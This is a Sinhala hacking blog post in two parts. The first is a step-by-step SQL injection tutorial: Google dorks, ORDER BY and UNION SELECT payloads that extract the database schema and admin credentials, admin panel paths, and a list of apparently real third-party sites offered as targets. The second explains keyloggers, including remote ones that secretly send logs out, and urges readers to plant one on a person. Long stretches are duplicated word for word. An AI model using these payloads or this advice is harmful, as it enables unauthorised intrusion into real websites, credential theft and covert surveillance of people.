Vulnerable Site වලට ගේම දෙමු. - SQLi Injection (Education Purpose Only)
Saturday, January 2, 2016
Posted by Mr Elite_x
Tag :
SQL injection
Vulnerable Site වලට ගේම දෙමු. - SQLi Injection (Education Purpose Only)
ඔන්න ඉතින් මේ කියලා දෙන්න යන්නේෆට්ටම ගේමක් දෙන විදිහ. අපි මේක සයිට් වලට ගේමක් දෙන්න තමයි භාවිත කරන්නෙ.... මේක ඩේටාබේස් එක ඇතුලට රිංගලා දෙන ගේමක්. ක්රමයත් එක්කම කියලා දෙනවා. අර උඩ දාලා තියන එක දැක්කනෙ. (Education Purpose Only) ඒ කිව්වෙ කරන්න බෑ. ඉගෙනගන්න විතරයි කියලා බං... මම කිව්වත් නැතත් උබලා කරනවා. හැබැයි අපේ ෆෝරම්, අපේ බ්ලොග් එකේ නම ගාවලා නම් ගේම් දෙන්න යන්න එපා ඈ....
මේකට කියන්නෙ SQL Injections.. දැන් කියන්න එපා මේකද කියන්නෙ, අපෝ ඕකත් වැඩක්ද කියලා. දන්නවා නම් කටවහගෙන හිටපල්ලා. මේ කියන්නෙ දන්නෙ නැති අයට විතරයි ඈ... SQL Injections කිව්වම අද ඉපදෙන එකා පවා දන්නවා. උබලා දන්නෙ නැත්තම් ඒක උබලගෙ වරදක් නෙවෙයි. මේවා කියලා දෙන්න තහනම් අපේ රටේ පාලකයන්ගෙ අවුලක් ඈ.... මේක ෆුල් ටියුට් එකක්. ඒ නිසා මේක කොහේවත් දාලා නම් අහුවෙන්න එපා. එහෙනම් පටාන් ගමු නේද...!
මොකක්ද මේ SQL Injections කියන්නෙ...?
මේ SQL Injections කියන්නෙ අපේ වෙබ්සයිට් හැදිලා තියන ක්රමයක්. මේකෙදි වැරැද්දක් උනොත් අපේ සයිට් එකටම බලපානවා. ඒවගේ තැන් වලට කියන්නෙ Vulnerable SQL Injections කියලා. අන්න ඒවායෙ තියන දෝශ නිසා අපිට පුළුවන් වෙනවා ඒ සයිට් එක ඇතුලට ගිහින් ආතල් ගන්න.
උබලට තේරුනේ නෑ කියලා දන්නවා. මේක නිකන් ගමේ කෑල්ලක් එක්ක සෙට් වෙලා ඉද්දි ඒකිව කොල්ලගෙ ගෙදර නවත්තලා කෙල්ලගෙ දෙමව්පියොයි, කොල්ලගෙ දෙමව්පියොයි මල ගෙදරක යනවා වගේ වැඩක්. මේකෙදි කෙල්ල තමයි Vulnerable Site එක. කොල්ලා තමයි මේ සයිට් එකට ගේම දෙන බුවා. එතකොට කෙල්ලගෙ දෙමව්පියො තමයි සයිට් එකේ Vulnerable.... ආ දැන් තේරුනා නේද...
මේ ක්රමේදි අපිට පුළුවන් ඇඩ්මින්ගෙ මේල් එකයි, පාස්වර්ඩ් එකයි හොයාගන්න පුළුවන්. ඒ කියන්නෙ කෙලින්ම Admin Panel එකටම රිංගනවා. ඒ කියන්නෙ මේක ෆෝරම් එකක් නම් අනිත් අයගෙ විස්තර ටික නිකම්ම ලැබෙනවා. එහෙනම් දැන් වැඩේට බහිමු... දැන් කියන්න කියෙන්නෙ VPN එකක්, Proxy එකක් දාගත්තට කමක් නෑ හොදේ...
කොහොමද Vulnerable සයිට් එකක් හොයාගන්නෙ?
මුලින්ම ගූගල් දෙයියා ලගට යන්න. ඊළගට ඉතින් කැමති Dork එකක් සර්ච් කරන්න. මේ ඩෝර්ක් නම් ඇති වෙනකම් තියනවා. ඒත් මම මෙතන දාන්නෙ ටිකයි. අනිත් ටික ඕනෙනම් පහලින් බාගන්න....
inurl:news.php?id=
inurl:event.php?id=
inurl:order.php?id=
inurl:user.php?id=
inurl:restaurant.php?id=
inurl:buy.php?id=
මම අනිත් ඩෝර්ක් ටික පහලින් දාලා තියනවා. ඕනෙනම් ඒ ටික බාගන්න....
මෙන්න අනිත් ඩෝර්ක්ස් ටික....
Download
දැන් අපිට ලැබෙන රිසාල්ට් වලින් කැමති එකකට යන්න. යන්න කලින් බලහල්ලා ඔය = ලකුණට පස්සෙ තියන ඉලක්කම පොඩ්ඩක් ඈ... 20ට වැඩියි වගේනම් යන්න එපා දෙයියො. මම එහෙම කියපු හේතුව ඉස්සරහට තේරෙයි.
දැන් අපිට සයිට් එකක් තියනවා. මම මේ සයිට් එක ගන්නම්. මම ඩිෆේස් කරලා නෑ... උදාහරනයකට විතරයි.
දැන් මේකෙ පේන්න තියනවා ඔයාලට ලින්ක් එක අගට id?=1 කියලා එකක් තියනවා. අන්න ඒක අගට ' දාලා බලන්න ඔනෙ මොකක් හරි එරර් එකක් එනවද කියලා. මේ විදිහට බලන්න.
මෙහෙම කරලා බලලා MySQL එරර් එකක් ආවෙ නැත්තම් ඉතින් අපිට බලන්න වෙනවා 2නි එකේ එරර් එකක් තියනවද කියලා. ඒකෙත් තිබුනෙ නැත්තම් දිගට බලන්න වෙනවා. ඒ නිසයි කිව්වෙ 20ට වැඩි ඒවා එපා කියලා.
දැන් අපිට එරර් එකක් ආවා කියලා සලකලා වැඩේ කරමු. ඊළගට අපිට ඕනෙ කරනවා මේ සයිට් එකේ තියන කොලම් ගාන හොයාගන්න. ඒක කරන්නෙ අපි අර ලින්ක් එකම අරගෙන ඒක අගට order by 2-- කියලා දාලා බලන්න. ඒකෙ එරර් එකක් නැත්තම් 3 දාලා බලන්න....
http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 3--
*NO ERROR*
http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 4--
*NO ERROR*
http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 5--
*ERROR*
ඔන්න 5 වෙනි කොලම් එකේ එරර් එකක් තියනවා. ඒ කියන්නෙ මේකෙ තියෙන්නෙ කොලම් 4යි. 5 වෙනි එක නැති නිසා තමයි එරර් එකක් එන්නෙ.
Vulnerable Column එක හොයාගමු
දැන් අපි දන්නවා මේ සයිට් එකේ තියන කොලම් ගාන. දැන් බලන්න හදන්නෙ Vulnerable Column එක මොකක්ද කියලා. දැන් අපි මේකෙ තියන කොලම් සිලෙක්ට් කරගන්නෙ කොහොමද කියලා බලමු.
URL එක අගට union select 1,2,3,4-- කියලා තමයි මට දාගන්න වෙන්නෙ. ඒක කරන්න කලින් කියන්න ඕනෙ අර ?id=1 කියලා තිබුන එක ?id=-1 කියලා දාන්න ඕනෙ. දැන් අර අපි හොයාගත්ත කොලම් එක මුල ඉදන් 1,2,3,4 කියලා දාලා බලනවා.
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,2,3,4--
විශේෂයි - අර = ලකුණට පස්සෙ "-" දාන්න මතක තියාගනිල්ලා ඈ...
අපි මේක කරද්දි අපිට ඩිස්ප්ලේ වෙනවා කොලම් එකක්. අන්න ඒක තමයි වීක් කොලම් එක. ඒක මතක තියාගන්න.
Database එකේ වර්ෂන් එක බලමු.
දැන් අපි ඩේටාබේස් එකේ වර්ෂන් එක හොයාගන්න ඕනෙ. ඒක හොයාගන්නෙ අපි එකඑක වර්ෂන් එකට යූස් කරන්නෙ එක එක කමාන්ඩ්. ඩේටාබේස් එක වර්ෂන් 5 නම් කිසිම අවුලක් නෑ. ඊට උඩ නම් කොහෙත්ම අවුලක් නෑ. ඒත් පහල එකක් නම් පොඩ්ඩක් අවුල්. මේ කමාන්ඩ් වැඩ කරන්නෙ 5 හෝ 5ට වැඩි නම් විතරයි. එහෙම කිව්වා කියලා අවුලක් ගන්න එපා. මම අවසානයට දෙනවා සයිට් 2, 3ක්....
ඒකට කලින් ලින්ක් එකම අරගෙන අර අපිට ඩිස්ප්ලේ කරපු කොලම් එක තියන තැනට @@Version කියලා දාගන්න.
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,@@version,3,4--
මට මේකෙ පෙන්නුවේ 2නි කොලම් එක නම් ඒක තමයි මෙතනට දාලා තියෙන්නෙ. පේනවනෙ 2 වෙනුවට @@Version දාලා තියනවා.
දැන් අපිට පෙන්වනවා මේකෙ වර්ෂන් එක... මේ වගේ එකක් පෙන්වයි.
5.1.47-community-log
මේක වර්ෂන් 5. ඒ නිසා කිසිම අවුලක් නෑ. අපේ වැඩේ කරන්න පුළුවන්.
ඩේටාබේස් එකේ නම හොයමු.
මේක ගොඩක් වැදගත් දෙයක්. මේක නැතුව ඇත්තටම වැඩේ කරන්න බෑ. මේ දෙන කෝඩ් එක ලින්ක් එකේ අගට දාගෙන බලන්න. මේක වෙනස් කරගන්න විදිහ කියලා දෙන්න ඒනෙ නෑනෙ.
http://hopefullyvulnerablesite/event.php?id=-1 union select 1,group_concat(schema_name),3,4 from information_schema.schemata--
Download
දැන් අපිට ලැබෙන රිසාල්ට් වලින් කැමති එකකට යන්න. යන්න කලින් බලහල්ලා ඔය = ලකුණට පස්සෙ තියන ඉලක්කම පොඩ්ඩක් ඈ... 20ට වැඩියි වගේනම් යන්න එපා දෙයියො. මම එහෙම කියපු හේතුව ඉස්සරහට තේරෙයි.
දැන් අපිට සයිට් එකක් තියනවා. මම මේ සයිට් එක ගන්නම්. මම ඩිෆේස් කරලා නෑ... උදාහරනයකට විතරයි.
http://www.hopefullyvulnerablesite.com/event.php?id=1
දැන් මේකෙ පේන්න තියනවා ඔයාලට ලින්ක් එක අගට id?=1 කියලා එකක් තියනවා. අන්න ඒක අගට ' දාලා බලන්න ඔනෙ මොකක් හරි එරර් එකක් එනවද කියලා. මේ විදිහට බලන්න.
http://www.hopefullyvulnerablesite.com/event.php?id=1'
මෙහෙම කරලා බලලා MySQL එරර් එකක් ආවෙ නැත්තම් ඉතින් අපිට බලන්න වෙනවා 2නි එකේ එරර් එකක් තියනවද කියලා. ඒකෙත් තිබුනෙ නැත්තම් දිගට බලන්න වෙනවා. ඒ නිසයි කිව්වෙ 20ට වැඩි ඒවා එපා කියලා.
දැන් අපිට එරර් එකක් ආවා කියලා සලකලා වැඩේ කරමු. ඊළගට අපිට ඕනෙ කරනවා මේ සයිට් එකේ තියන කොලම් ගාන හොයාගන්න. ඒක කරන්නෙ අපි අර ලින්ක් එකම අරගෙන ඒක අගට order by 2-- කියලා දාලා බලන්න. ඒකෙ එරර් එකක් නැත්තම් 3 දාලා බලන්න....
http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 3--
*NO ERROR*
http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 4--
*NO ERROR*
http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 5--
*ERROR*
ඔන්න 5 වෙනි කොලම් එකේ එරර් එකක් තියනවා. ඒ කියන්නෙ මේකෙ තියෙන්නෙ කොලම් 4යි. 5 වෙනි එක නැති නිසා තමයි එරර් එකක් එන්නෙ.
Vulnerable Column එක හොයාගමු
දැන් අපි දන්නවා මේ සයිට් එකේ තියන කොලම් ගාන. දැන් බලන්න හදන්නෙ Vulnerable Column එක මොකක්ද කියලා. දැන් අපි මේකෙ තියන කොලම් සිලෙක්ට් කරගන්නෙ කොහොමද කියලා බලමු.
URL එක අගට union select 1,2,3,4-- කියලා තමයි මට දාගන්න වෙන්නෙ. ඒක කරන්න කලින් කියන්න ඕනෙ අර ?id=1 කියලා තිබුන එක ?id=-1 කියලා දාන්න ඕනෙ. දැන් අර අපි හොයාගත්ත කොලම් එක මුල ඉදන් 1,2,3,4 කියලා දාලා බලනවා.
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,2,3,4--
විශේෂයි - අර = ලකුණට පස්සෙ "-" දාන්න මතක තියාගනිල්ලා ඈ...
අපි මේක කරද්දි අපිට ඩිස්ප්ලේ වෙනවා කොලම් එකක්. අන්න ඒක තමයි වීක් කොලම් එක. ඒක මතක තියාගන්න.
Database එකේ වර්ෂන් එක බලමු.
දැන් අපි ඩේටාබේස් එකේ වර්ෂන් එක හොයාගන්න ඕනෙ. ඒක හොයාගන්නෙ අපි එකඑක වර්ෂන් එකට යූස් කරන්නෙ එක එක කමාන්ඩ්. ඩේටාබේස් එක වර්ෂන් 5 නම් කිසිම අවුලක් නෑ. ඊට උඩ නම් කොහෙත්ම අවුලක් නෑ. ඒත් පහල එකක් නම් පොඩ්ඩක් අවුල්. මේ කමාන්ඩ් වැඩ කරන්නෙ 5 හෝ 5ට වැඩි නම් විතරයි. එහෙම කිව්වා කියලා අවුලක් ගන්න එපා. මම අවසානයට දෙනවා සයිට් 2, 3ක්....
ඒකට කලින් ලින්ක් එකම අරගෙන අර අපිට ඩිස්ප්ලේ කරපු කොලම් එක තියන තැනට @@Version කියලා දාගන්න.
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,@@version,3,4--
මට මේකෙ පෙන්නුවේ 2නි කොලම් එක නම් ඒක තමයි මෙතනට දාලා තියෙන්නෙ. පේනවනෙ 2 වෙනුවට @@Version දාලා තියනවා.
දැන් අපිට පෙන්වනවා මේකෙ වර්ෂන් එක... මේ වගේ එකක් පෙන්වයි.
5.1.47-community-log
මේක වර්ෂන් 5. ඒ නිසා කිසිම අවුලක් නෑ. අපේ වැඩේ කරන්න පුළුවන්.
ඩේටාබේස් එකේ නම හොයමු.
මේක ගොඩක් වැදගත් දෙයක්. මේක නැතුව ඇත්තටම වැඩේ කරන්න බෑ. මේ දෙන කෝඩ් එක ලින්ක් එකේ අගට දාගෙන බලන්න. මේක වෙනස් කරගන්න විදිහ කියලා දෙන්න ඒනෙ නෑනෙ.
http://hopefullyvulnerablesite/event.php?id=-1 union select 1,group_concat(schema_name),3,4 from information_schema.schemata--
group_concat(schema_name) - කලින් @@version තිබුන තැනට මේක දාන්න.
from information_schema.schemata-- - මේ ටික වෙනස් නොකර දාන්න...
දැන් මේ ටිකත් ඒ විදිහටම කරන්න.
Quote:http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,concat(database()),3,4--
concat(database()) - වීක් කොලම් එක තිබුන තැනට මේක දාගන්න.
දැන් හරි මේ ටික කරගත්තා කියන්නෙ වැඩේ ඉවරයි වගේ තමයි. මේකෙදි අපිට පෙන්වයි ඩේටාබේස් එකේ නම...
ඩේටාබේස් එකේ Table විවෘත කරමු.
දැන් අපි ඩේටාබේස් එකේ ටේබල් ටික බලන්න තමයි හදන්නෙ. මේක තමයි ටිකක් දිග කෝඩ් එක.
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--
group_concat(table_name) - වීක් කොලම් එක තිබුන තැනට දාන්න.
FROM information_schema.tables WHERE table_schema=database()-- - වෙනස් නොකර තියන්න.
දැන් අපිට ඩේටාබේස් එකේ කොලම් පෙන්වනවා.
Table වල තොරතුරු බලමු.
මේකෙදි අපි කරන්නෙ ටේබල් වල තොරතුරු මොනවද කියලා බලන එකයි. හැබැයි බලන්නෙ ඇඩ්මින්ගෙ විස්තර විතරයි ඈ. ඒක තිබුනම ඇතිනෙ.
Quote:http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="admin_credentials"
වෙනස් කරන ඒවා කියන්න යන්නෙ නෑ. දැන් දන්නවනෙ.
මේක කරද්දි එරර් එකක් ආවොත් අපිට මේ admin_credentials එක Hex කරන්න වෙනවා. ඕවට ඉතින් ලේසි ක්රම තියනවා. මේ සයිට් එකට ගිහින් බලහල්ලකො.
swingnote
ඒක කලාම එන්නෙ මෙන්න මේ වගේ එකක්.
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x61646d696e5f63726564656e7469616c73
දැන් අපිට පෙන්වනවා ගින්දර වගේ Username එකයි Password එකයි. ඕක ගහලා ලොග් වෙන්න තියෙන්නෙ. ඇඩ්මින් පැනල් එක හොයාගන්න බැරිනම් Havij හරි අර මම කලින් දුන්න පෝස්ට් එකේ තිබුන ලොග්ස් හරි යූස් කරන්න. මේ ටික තමයි නිතරම එන්නෙ....
/admin
/admin.php
/login.php
/admin/index.php
/login/index.php
/adminlogin
/adminlogin.php
/adminlogin/index.php
/moderator.php
/moderator
/modlogin
සමහරවිට ඕවායේ පාස් එක MD5 වලින් ඇති. එහෙම උනොත් මේකට කමෙන්ට් එකක් විදිහට දාන්න මම හදලා දෙන්නම්...
මෙන්න මගෙ ගානෙ සයිට් ටිකක්....
http://www.orthphoto.net/user.php?id=1
www.nezzwerk.com/seven/user.php?id=1
http://www.ias100.in/news_details.php?id=231'
www.ukdota.net/user.php?id=1
www.etaew.net/trove/user.php?id=1
ඒක කලාම එන්නෙ මෙන්න මේ වගේ එකක්.
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x61646d696e5f63726564656e7469616c73
දැන් අපිට පෙන්වනවා ගින්දර වගේ Username එකයි Password එකයි. ඕක ගහලා ලොග් වෙන්න තියෙන්නෙ. ඇඩ්මින් පැනල් එක හොයාගන්න බැරිනම් Havij හරි අර මම කලින් දුන්න පෝස්ට් එකේ තිබුන ලොග්ස් හරි යූස් කරන්න. මේ ටික තමයි නිතරම එන්නෙ....
/admin
/admin.php
/login.php
/admin/index.php
/login/index.php
/adminlogin
/adminlogin.php
/adminlogin/index.php
/moderator.php
/moderator
/modlogin
සමහරවිට ඕවායේ පාස් එක MD5 වලින් ඇති. එහෙම උනොත් මේකට කමෙන්ට් එකක් විදිහට දාන්න මම හදලා දෙන්නම්...
මෙන්න මගෙ ගානෙ සයිට් ටිකක්....
http://www.orthphoto.net/user.php?id=1
www.nezzwerk.com/seven/user.php?id=1
http://www.ias100.in/news_details.php?id=231'
www.ukdota.net/user.php?id=1
www.etaew.net/trove/user.php?id=1
අනිත් කාරනේ තමයි මේකෙන් ඩවුන් කරන සයිට් එකකවත් අපේ නම ගෑවෙන්න බෑ. ඒ වගේම මේ පෝස්ට් එක වෙන කොහේවත් දාන්නත් බෑ හොදේ... මේක Education Purpose Only.
MD5 වලින් තියන පාස්වර්ඩ් එක මට කියලා ඇරගන්න ලැජ්ජයි වගේ නම් මේකෙන් ගිහින් කරගනිල්ලා.
ඒ වගේම Vuln සයිට් එකක් හොයාගන්න SQLi Scanner එකක් යූස් කරන්නත් පුළුවන්....
මම එච්චරම වැඩ්ඩෙක් කියලා හිතන්න එපා. අදකාලෙ ඉපදෙන එකත් මේවා ගැන දන්නවා ඈ....
එහෙනම් හැපී හැකින් ඈ....
මොකක් හරි උදවුවක් ඕනෙ නම් කමෙන්ට් කරන්න....
Key-Loggers ගැන මුල සිටම ඉගෙන ගන්න..
එලයිට් කොල්ලගෙන් තවත් ටියුට් එකක්...
කස්ටියට අද මම කියලා දෙන්න යන්නේ Key-logging ගැන මුල සිට අගට ,, මේකත් එක්තරා කලාවක් නිකන් සොෆ්ට් එකක් අරන් කරන්න බැහැ... දැනගන්න ඕන කරනු කීපයක් තියනවා... මම අද ඒ ඔක්කම ටික පැහැදිලි කරලා කියලා දෙනවා ඒ විතරක් නෙවෙයි... කොහොමද මේ කී-ලොගර් වැඩ කරන්නේ කියලත් මම කියලා දෙනවා. දැන් කට්ටිය කියන දේ මට මැවිලා පේනවා... "ආවුස් අප්පා එලනෙ."
______________________________________________________මොනවද මේ කී-ලොගර්
මෙතන ඉන්න ගොඩාක් කස්ටියනම් දන්නවා ඇති කී-ලොගර් එකකින් කරන වැඩේ.... දන්නේ නැති කස්ටිය.... කී-ලොගර් වර්ග කීපයක් තියනවා , ඒ කිව්වේ මූලික වශයෙන් දෙකක්...
1) Hardware Based2) Software Based
දැන් මේවාගැන දන්නේ නැති කස්ටියට මම සරල කිව්වට ටිකක් ලොකු හැදින්වීමක් කරන්න යන්නේ.. අපි ගහන හැම අකුරක්ම එකතු කරගෙන තැන්පත් කරගන්න හොර සොෆ්ට්වෙයා එකකට තමයි කී-ලොගර් එකක් කියලා අපි කියන්නේ...
මේ එකතු කරගන්න දත්ත හැකරුවාට Remotely යවනවා කාටත් හොරෙන්... (මෙතන හැකරුවා කියන්නෙ අපිටලු ඈ..) මේ දත්ත හැකරුවා විසින් සකස් කරපු ආකරයට අනුව කාටත් හොරෙන් යවනවා... විනාඩි 10න් 10ට හෝ හැකර් සෙට් කරපු විදිහට මේක ලොග්ස් එලියට යවනවා....
එක්කො ඊ-මේල් ලිපිනයක්ට නැතහොත් වෙබ් අඩ්වියටකට මෙම සොරාගත් ලොග්ස් එක කී-ලොගර් සර්වර් එක විසින් යවනවා... නමුත් සමහරක් කී-ලොගර් නම් මම දත්ත එම පරිගණකයේම හොරෙන් තියලා තියනවා හැකර්ට ආපු වෙලාවට ගන්න මම මේවා ගැන ඉස්සරහට පැහැදිලි කරලා දෙනවෝ.......
Hardware Based Keyloggers
මම මුලින්ම කතා කරන්නම්කො Hardware Based Key-loggers ගැන - නම අහපු ගමන් තෙරෙනවනේ.... මේක අනිවාරයෙන් Victim Computer එකට Attach කරලා තියෙන්න ඕන.... ඒ කිව්වේ කොහෙන් හරි ගේම දෙන්න ඕන එකාගේ කොම්පියුටරේට පූට්ටු කරලා තියෙන්නේ ඕනේ...
පල්ලේහා මම දානව පොඩි සාම්පල් වගයක්.. බලන්නකෝ.... තාම ඉවර නැහැ.. මේකෙත් ජාති ගොඩාක් කිව්වට 3ක් තියනවා...
Inline Hardware KeyloggersInstallable Hardware KeyloggersBuilt-In Hardware Keyloggers
මම දැන් මේවා ගැන ටිකක් පැහැදිලි කරලා දෙන්නම්.
#1 Inline Hardware Keyloggers
මේවා තමයි දැනට ගොඩාක් වෙලාවට මාකට් එක හාඩ්වෙයා-කීලොගර් කියලා තියෙන්නේ , මේක කටින් පැහැදිලි කරනවට වාඩා පින්තූරයක් ආදාරයෙන් පෙන්නන එක ලේසි කියලා මට හිතෙනවා
දැන් සීන් එක පැහැදිලි නේ? දැනටම ඊබේ එකේ සහ එක එක චයිනීස් වෙබ් සයිට් වල මෙවා විකුනන්න තියනවා... මේක නියම බාන්ඩේ ඒත් ඉතින් පිටිපස්ස බැලුවොත් මොකෙක්-හරි සීන් එක මාට්ටු අනික ඉතින් වයර් නැති කී-බෝඩ් පාවිච්චි කරන එවුනුත් ඉන්නව නොවැ...
#2 Installable Hardware Keyloggers
මෙන්න මේවාගැනනම් මම වැඩිය දන්නේ නැහැ ... හොයාගත්ත තොරතුරු අනුව මේක Compter එකක් ඇතුලට සෙට් කරන්න පුලුවන් ගැජට් එකක්... මේක අස්සට සෙට් කරන නිසා ගොඩාක් හොයගන්න අමාරුයි කියලා තමයි කස්ටිය කියන්නේ හැබැයි ඉතින් මේක හැම Machine / Computer එකකටම Fit වෙන්නේ නැල්ලු හරියටම... (මට නම් බය වෙන්න දෙයක් නෑ බං, මගෙ මේ පරන PC එකට ඔය මුකුත් සෙට් වෙන්නෙ නෑ...)
මම හිතන්නේ දැන් මේ සීන් එක කල් පැනලා වෙන්න ඇති.... මට මේ ගැන විස්තර හොයන්නත් හෙන කස්ටියක් කන්න උනා.
#3 Built-in Hardware Keyloggers
නම කියෙවෙව ගමන් තෙරෙන්න ඇති කියලා හිතනවා, මේ ජාතියේ ඒවානම් වැහි වැහැලා.. සමහර වෙලාවට තෑගි විදිහටත් මේ ජාතියේ කී-බෝඩ් එකක් හම්බවෙනවා. (වැඩිපුරම හම්බ වෙන්නෙ IT මිස්ලට එහෙම තමයි)
කී-බෝඩ් එක්ක කී-ලොගර් එකතු කරලා හදන සීන් දැන් තියනවා, ඒ තමයි මේ Built-In Hardware Keyloggers... කී-බෝඩ් එකේම කී-ලොගර් එක.. හරිම සිම්පල් ප්ලැන් එකක්... කවදාවත් මාට්ටුනම් වෙන්නෙ නැහැ... ටයිප් කරන ඔක්කොම ටික තියෙන්නේ කී-බෝඩ් එක ඇතුලේමනේ...
උබලත් මේ වගේ එකක් හොයාගෙන IT මිස් කෙනෙක්ට දීලා බලපල්ලා. වැඩක් ගන්න බැරි වෙන එකක් නෑ...
කොහොමත් මේවා ඉස්කෝලවල සහ කැෆේ වල දැන් පුරවලා තියනවා පරිස්සමෙන් හොදේ, මහලොකු හැකර්ලටත් කෙල වෙන්නේ මේවා නිසා තමයි කැෆේ වලින් හැක් කොරන්න ගිහිල්ලා.
ඔන්න දැන් අපි හාඩ්වෙයා කී-ලොගර් ගැන කතා කරලා ඉවරයි... දැන් අපි බලමු මොනවද මේ සොෆ්ට්වෙයා කී-ලොගර් ජාති කියලා..
Software Based Keyloggers
ඔව් ඔව් .. මම දන්නවා... මේක තමයි කස්ටිය ආසවෙන් බලන්න ඉන්න එක... සොෆිට්වෙයා කී-ලොගර්... කිව්ව ගමන් බොක්කටම සෙට් වෙන ටොපික් එක... හරි, මෙකෙත් ජාති 2කක් තියනවා... අපි ඒ ගැන ඉස්සර වෙලා කත කරමු.
#1 Inbound Software Keylogger#2 Remote Software Keylogger
දැන් මම කලින් වගේ මේ දෙක ගැන ටිකක් පැහැදිලි කරලා කියන්නම්.
Inbound Software Keylogger
මෙන්න මෙහෙමයි සීන් එක.. (මට දැන් මැවිලා පේනවා උබලා දත-කට මැදගෙන මේක බලනවා කියලා...) මේක වැඩියනම් පාවිච්චි වෙන්නෙ නැහැ මොකද මේක අපිට හොරෙන් Install කරන්න බැහැ, එ කිව්වෙ අර EXE එක Click කරපු ගමන් Install වෙන්නෙ නැහැ...
මෙන්න මෙහෙමයි, මේක දාන්න අපි Computer එකට යන්නම ඕනැ, Normal Software එකක් Install කරන විදිහට මේක Install කරන්න ඕනැ. එතොකොටම තෙරෙනවනේ සීන් එක හැන්ගිලා දෙන්න පුලුවන් ගේමක් නෙවෙයි මේක...
දැම්මට පස්සේ Keylogger එක හැන්ගිලා වැඩ පටන් ගනන්වා, අපි ගහන හැම මගුලක්ම Record කරගන්නවා... මම දැනට තියන Inbound Key loggers වල Features ටිකක් දාන්නම්...
# Web Cam Snapshot Capture
# Screenshot Capture
# Key-logging
# Emailing Logs To Specific Email Address
# Upload Logs to Web/FTP Servers
# Visited Web Sites
සහ තවත් අනන් මනන් තියනවා, විශේෂයෙන් කියන්න ඕනැ... මේවගෙන් දෙන Logs ගොඩාක් පිලිවෙලයි. ලස්සනට වෙන් කරලා පෙන්නනවා..
Skype Chats, Facebook chats, Web Site Logins, Search Engine History සහ අනන් මනන් වෙන් කරලා පිලිවෙලට පෙන්නවා පාට පාට වලින්, කස්ටිය බලයි මම කොහොමද මේවා මෙච්චර දන්නේ කියලා... මමත් මේකක් පාවිච්චි කරලා තියනවා...
ඔයගොල්ලො මේ වගේ එකක් හොයනවනම් මෙන්න බාන්ඩේ...
Download
මෙකේ තියන විශේෂත්වේ තම්යි ලොග්ස් තියෙන්නේ අපේ කොම්පුයුටරේම තමයි, අනික කී-ලොගර් සොෆ්ට්වෙයා එකට ටග් ගාලා අපිට ලොග් වෙනන් පුලුවන්.... වැඩිගේම් නැහැ.
මේකනම් ගොඩාක් පාවිච්චි වෙන්නෙ ඔය ගෑනුන්ගේ හොර අල්ලන්න තමයි නැත්තම් ඔෆිස් වල ඕවා දාලා තියනවා වැඩ කරන එවුන්ගේ හොර අල්ලන්න... වැල බලද්දි පරිස්සමෙන් අහා...
Remote Software Keylogger
ඔන්න අහගන්නකො සීන් එක, මෙතන වෙන්නේ අපි කී-ලොගර් සොෆ්ට්වෙයා එකකින් වෙන කොම්පුයුටරේකට යවන්න පුලුවන් විදිහෙ පොඩි සර්වර් එකක් හදාගන්න එක..
තෙරුනා මදි ඇති, මට මූන දැක්කාම කියනන් පුලුවන්. (මට උබලගෙ මූන මේ ස්ක්රීන් එකෙන් පේනවා බං...) මෙතනදි තමයි අපි කව්රුත් දන්න Exe සීන් එක සෙට් වෙන්නේ...
මුලින්ම සොසොෆ්ට්වෙයා එක ඕපන් කරගෙන ඕනැ කරන විශ්තර ටික කොටලා Exe / Server හදාගන්න ඕන.... Remote Keylogger එකකින් කරන්නේ අපි කලින් කිව්ව විදිහටම ලොග්ස් හදාගනන් එක නමුත් පොඩ්ඩක් සීන් එක වෙනස්.... මෙතනදි අපි, හැකරුවා විසින් පොඩි Exe File එකක් Generate කරගනන්වා Remote Keylogger Software එකෙන්...
එකේ තියන්වා අපේ Ftp Account / Email Account Details ටික. ඒවට තමයි ලොග්ස් එන්නේ.... Inbound Keylogger එකේ තියන ඔකකොම හොර වැඩ ටික මේවාගේත් තියනවා නමුත් මේක Install කරන්න ඕනැ නැහැ... අර හදල දෙන Exe File ඔනැ එකෙක් ක්ලික් කරපු ගමන් බඩු බනිස්, පොර කරන හැමැ රෙද්දක්ම ගානට උඹට සෙට් වෙනවා....
ඔන්න බලන්නකෝ මේවාගේ තියන ජාති Remote Keylogger එකක
# Web Cam Snapshot Capture# Screenshot Capture# Icon Changers# MuteX [ Stops Duplicating Logs ]# Add to Startup# Disable CMD/Taskmanager/Registry# Fake Error Message# File pumper# Assembly Editing# Encrypted user information# Test connection# Key-logging# Emailing Logs To Specific Email Address# Upload Logs to Web/FTP Servers# Visited Web Sites
මේවා හදලා තියෙන්නේ අපිට ලං වෙන්න බැරි කොම්පුයුටර් වලට බස්සන්න, ඒ වගේම හොරෙන් කොරන්න... මොකද Exe එක ක්ලික් කරපු ගමන් බඩු හරි....
හැක් වෙන එකාට මෙලො දෙයක් තෙරෙන්න නැති වෙන්න තමයි මෙවා හදන්නේ....
එරර් මැසැජ් එකක් හෝ මේවා වෙන වෙන සොෆ්ට්වෙයා අස්සට කවල දෙන්න පුලුවන් මාට්ටු නොවෙන්න...
ක්ලික් කරපුවාම හිතන්න වෙන දෙයක් නමුත් බඩු හම්බෙනවා, කී-ලොගර් අහු වෙන්නේ නැතුව යවන ක්රම ගැන මම වෙනම ත්රේඩ් එකකින් කතා කරනවා.... කොහොමත් දැන් එන අලුත් රිමෝට් කී-ලොගර් අස්සේ ඕවා ඔබලමයි එවන්නේ...
කී-ලොගර් එකකින් ගන්න ෆුලුවන් වැඩ
